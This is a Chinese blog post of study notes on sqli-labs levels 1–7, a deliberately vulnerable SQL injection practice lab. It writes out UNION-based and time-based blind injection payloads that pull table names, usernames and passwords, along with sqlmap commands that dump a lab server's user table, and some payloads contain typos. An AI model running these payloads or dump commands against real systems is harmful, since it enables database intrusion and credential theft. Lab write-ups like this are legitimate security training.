SQL注入>>>sql-labs通关笔记(一)

最新推荐文章于 2023-08-03 13:46:28 发布
最新推荐文章于 2023-08-03 13:46:28 发布
阅读量1.1k 收藏 9
点赞数 10
分类专栏: WEB漏洞攻击及防御 文章标签: mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571759/article/details/104483436
版权

小记

针对如何学习SQL注入,我自己总结的三个大步骤:
1. 漏洞的判断检测和分类
2. 利用漏洞可以进行的攻击
3. 如何防御这些攻击

ps:以下指的是MySQL注入,MySQL数据库需要注意的一点:
MySQL5.0以下:这个版本是没有information_schema这个系统表的(据说这是笔试会遇到的题目),所以无法列表名,只能暴力跑表名;
MySQL5.0以上:这个版本默认有一个information_schema的数据库,相当于字典所以对数据库开发人员很方便,同时也对攻击者提供了方便,information_schema数据库有三个表一定要记住:
1. information_schema.schemata:该表存储了MySQL数据库中所有数据库的库名:
2. information_schema.tables:该表存储了MySQL数据库中所有数据表的表名;
3. information_schema.columns:该表存储了MySQL数据库所有列的列名;

有关SQL注入的知识我就不写太多啦,这篇也只是我做题的笔记(有错误请留言谢谢啦)
http://43.247.91.228:84/Less-1/懒人网址
也可以自己搭建靶机环境;
自己理解的一般SQL注入步骤:

1. 判断注入点是否存在及其SQL注入类型(如果可以猜测出语句)
2. 猜解字段长度
3. 确定数据库中的回显位
4. 查询数据库版本及其有用信息方便接下来的注入
5. 暴库名暴表名暴字段值

Less-1

在这里插入图片描述
进入平台我们可以看见这样的界面,一般刷题的时候英语不好的同学可以新建一个谷歌翻译的界面,然后复制粘贴去翻译,比如我,意思是说请输入ID作为带有数字值的参数,直接在URL后添加参数id=1:
在这里插入图片描述
有回显变化;可能存在SQL注入;接着我们再加入单引号;
在这里插入图片描述
发现报错,根据报错的提示我们判断这里存在SQL字符型注入;
此时我们闭合掉单引号发现页面回显正常(id=1’ --+ )确定是GET型基于报错的字符型(单引号闭合)SQL注入;

接下来猜解字段数:

id=1' order by 4 --+(从1猜到4发现报错)ps:这里为什么不能使用#注释掉单引号?是因为再URL中#是有固定含义的,表示页面中的锚点

所以这里字段数是4

在这里插入图片描述
判断显示位
?id=-1’ union select 1,2,3 --+
union联合查询需要让它左边的表达式为假,这里使id=-1
在这里插入图片描述
发现第二列和第三列显示;现在执行我们的第四步:

?id=-1' union select 1,version(),database --+

在这里插入图片描述
得到库名和数据库版本,在MySQL5.0版本以上;
暴库名(现在的库名是security)暴表名(会用到group_concat函数来合并成一个字段暴出来)

?id=-1' union select 1,2,group_concat(table_name) from infromation_schema.tables where table_schema='security' --+

在这里插入图片描述
暴字段

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

在这里插入图片描述
暴字段值

?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+

在这里插入图片描述
这是其中一种方法,还有一种是手工报错型注入,需要用到 extractvalue函数暂时我不是很会…
还有直接用sqlmap工具跑就完事儿!

Less-2

同样是按步骤来:
判断是否存在SQL注入(这个平台肯定是存在的,其实是在这里是多余的步骤哈哈哈)
那我们就来判断SQL注入的类型,输入id=1’报错,然后将单引号闭合发现页面还是报错;
判断可能是数字型注入,输入?id=1 and 1=1,页面正常;
在这里插入图片描述
输入?id=1 and 1=2,回显变得不一样了:
在这里插入图片描述
说明是数字型注入,接下来就很简单了,经过关卡1的洗礼应该是很简单的;
在这就只总结一下:

猜解字段长度:?id=1 order by 4 --+报错  三个字段
确定回显位:?id=-1 union select 1,2,3 --+  回显位是第2,3字段
获取信息(顺带暴库):?id=-1 union select 1,version(),database() --+   版本5.0以上  security数据库
暴表名:?id=-1 union select 1,group_concat(table_name),3 from information.schema.tables where table_schema='security' --+   表名users
暴字段:?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+    
暴字段值:?id=-1 union select 1,group_concat(username),group_concat(password) from users--+

Less-3

直接输入?id=1’ 根据提示输入的内容存到了单引号和圆括号之间 ‘1’’) LIMIT 0,1

在这里插入图片描述
输入?id=1’) --+回显正常页面:是基于错误五的GET字符型注入;
其余步骤和前面一样,只需要将单引号后加一个括号;
Less-4
和上述一样输入单引号,页面无回显;
输入双引号,页面报错:
在这里插入图片描述
根据提示本题和上一题不同的只有输入的内容存到了双引号和圆括号之间;所以也就不多说啦!

Less-5

输入?id=1,页面如图:
在这里插入图片描述
没有返回任何有用信息,第一反应就是基于时间的盲注、布尔型的盲注、
输入?id=1’报错,根据提示可以知道是单引号字符型注入
输入?id=1’ and sleep(5) --+有明显延迟,但是这种类型的手工注入会很麻烦,通过延迟来依次爆破数据库长度,库名,表名,列名;
这里只总结一下大致过程:

暴库长:?id=1' and if(length(database())=8,sleep(5),1)--+
暴库名:?id=1' and if(left(database(),1)='s',sleep(5),1)--+
暴表名:?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+
暴列名:?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+
爆破值:?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

还有布尔型的盲注和这种方法类似,真的太难了!要不是迫不得已才不会放着工具不用;
还有一种方法用双注入报错查询,原理是count函数遇到group by会报错,我这个不大懂
我是用sqlmap跑出来的:
在kali终端:sqlmap -u " http://43.247.91.228:84/Less-5/?id=1" --dbs --batch -p id
一下子就都出来啦
在这里插入图片描述

sqlmap -u "http://43.247.91.228:84/Less-5/?id=1" --dbs -p id --batch -D "security" --tables
sqlmap -u "http://43.247.91.228:84/Less-5/?id=1" --dbs -p id --batch -T "users" --columns
sqlmap -u "http://43.247.91.228:84/Less-5/?id=1" --dbs -p id --batch -C username,password --dump

在这里插入图片描述
爆破成功;

Less-6

老规矩,我们还是?id=1、?id=1’,页面都显示正常,然后输入?id=1"回显报错,根据提示,判断这是双引号字符型注入,和less-5一样也可以用sqlmap跑出来,手工注入方式思路也是一样的,所以就不再浪费时间做这个啦~

Less-7

按常规输入? id=1’回显错误,闭合单引号还是回显错误
那我们接着输入?id=1’)还是回显错误,闭合之后还是错误
试一下?id=1’))回显错误,闭合回显如下:
在这里插入图片描述
功夫不负有心人啊,然后根据提示是outfile函数,这里我做不了因为我还没有搭建这个实验靶机,是在在线服务器上做的。手工不了但是还是可以用sqlmap跑出来;
接下来八九十三题分别是:
布尔型单引号GET盲注;
基于时间的GET单引号盲注;
基于时间的双引号盲注;
注入方法和思路之前有介绍过,而且!!!有sqlmap工具用着他不香吗尤其是盲注和报错注入;

最后如有大佬看到帮忙指出错误,🙇‍🙇‍🙇‍

humble嘻
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 13万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqlilab通关教程
weixin_62281892的博客
05-17 1579
第一关:基于单引号的字符型注入 目录 第一关:基于单引号的字符型注入 先进行输入参数?id=1' 出现报错说明发现注入点,判断该类型为字符注入 order by 判断数据库--表--表里面的数据的列进行排序(从1开始) union select 1,2,3 -- 判断数据显示点 select system_user() 显示系统用户 select version() 显示版本信息 select @@datadir 数据库的安装路径 *查库: select schema_na
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 8861
sql注入集合
sql注入,基础练习1-4关卡
haozhe6666的博客
07-20 367
程序员为了防止sql注入,对用户输入中的单引号(')进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引 号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号闭合的作用,仅仅成为‘内容’;相信大家一定能发现它们之间的微小的区别,这也是数字型和字符型上的一个重要的区别,接下来的注入过程,我们只需要去想方设法的闭合掉 '$id' 前面的'和后面的语句及符号就ok了,然后后面的就是进行正常的一个注入过程了。要进行注入,得先知道是否能进行注入。
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sqli-labs靶场练习笔记
最新发布
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqIi-labs,SQL注入平台
08-06
sqIi-labs:是一款学习SQL注入的开源平台,共有75种不同类型的注入 解压密码:ms08067.com sqIi-labs的使用文章见:https://blog.csdn.net/qq_41453285/article/details/100827739
Pikachu靶场—sql注入通关
oiadkt的博客
03-07 4813
pickchu—sql注入通关
sqli-labs通关详解
m0_52051132的博客
10-15 6872
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sql注入(入门级)sql闯关思路
认真走好每一小步
06-23 437
通过操纵SQL语句,使得应用程序在数据库上执行攻击者指定的恶意SQL语句的一种攻击方式。攻击者可以通过应用程序的输入界面,如表单、URL参数等方式,将恶意的SQL代码注入到应用程序中,从而访问,修改,删除甚至控制数据库内的数据和系统。
渗透测试SQL注入——Sqlilabs关卡详解
人若有志,就不会在半坡停止。
10-18 954
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
sqli_labs通关秘籍
qq_43816912的博客
09-09 1373
辛苦总结的,希望可以帮助初学者,如有错误,请大家提出,我一定虚心改正。
sqli-labs前十关记录
墨子辰的博客
01-29 571
目录第一题:布尔报错注入第二题:布尔报错注入第三题: 布尔报错注入 ‘ 报错第四题:布尔报错注入“ 报错第五题:双查询注入 ' 注入开始解题:第六题: 双查询注入 " 报错第七题:导出文件GET字符型注第八题: 布尔盲注第九题:基于时间盲注 ' 报错第十题:基于时间盲注 " 报错 第一题:布尔报错注入 ?id=1' ?id=1' and 1=1--+ 确认漏洞是否存在 ?id=1' order by 3--+ 确定字段数 ?id=-1' union select 1,2,3--+ 确定显示位置
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1850
union注入详细教程
Sqli-labs通关攻略(持续更新ing
qq_50808416的博客
05-11 1425
sqli-labs详细攻略
Sqli-libs(Less7~Less23)通关详解,通篇大白话,看完不懂直接v你50吃KFC
henghengzhao_的博客
10-18 1188
大白话讲解,通篇写的是我做题的一个思路,建议先了解一下sql注入的基本原理再来看,主要针对人群,sql注入初学者,来刷sqli-libs靶场但是感觉吃力的。看完要还是不会,来来来,评论区留言,我v你50吃个KFC

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值